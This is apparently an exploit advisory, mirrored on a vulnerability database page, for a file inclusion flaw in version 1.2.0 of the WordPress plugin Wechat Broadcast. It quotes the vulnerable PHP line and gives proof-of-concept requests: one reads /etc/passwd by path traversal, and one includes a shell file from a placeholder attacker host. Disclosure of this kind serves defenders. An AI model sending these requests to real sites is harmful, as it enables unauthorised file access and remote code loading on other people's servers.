Lucene search
K

WordPress Wechat Broadcast 1.2.0 Local File Inclusion

🗓️ 19 Sep 2018 00:00:00Reported by Manuel Garcia CardenasType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

WordPress Wechat Broadcast 1.2.0 Local File Inclusion vulnerability found in Image.ph

Code
`# Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion  
# Author: Manuel Garcia Cardenas  
# Date: 2018-09-19  
# Software link: https://es.wordpress.org/plugins/wechat-broadcast/  
# CVE: N/A  
  
# Description  
# This bug was found in the file: /wechat-broadcast/wechat/Image.php  
# echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');  
# The parameter "url" it is not sanitized allowing include local or remote files  
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol   
# to interact with the application.  
  
# PoC  
# The following URL have been confirmed that is vulnerable to local and remote file inclusion.  
  
GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd  
  
# Remote File Inclusion POC:  
  
GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation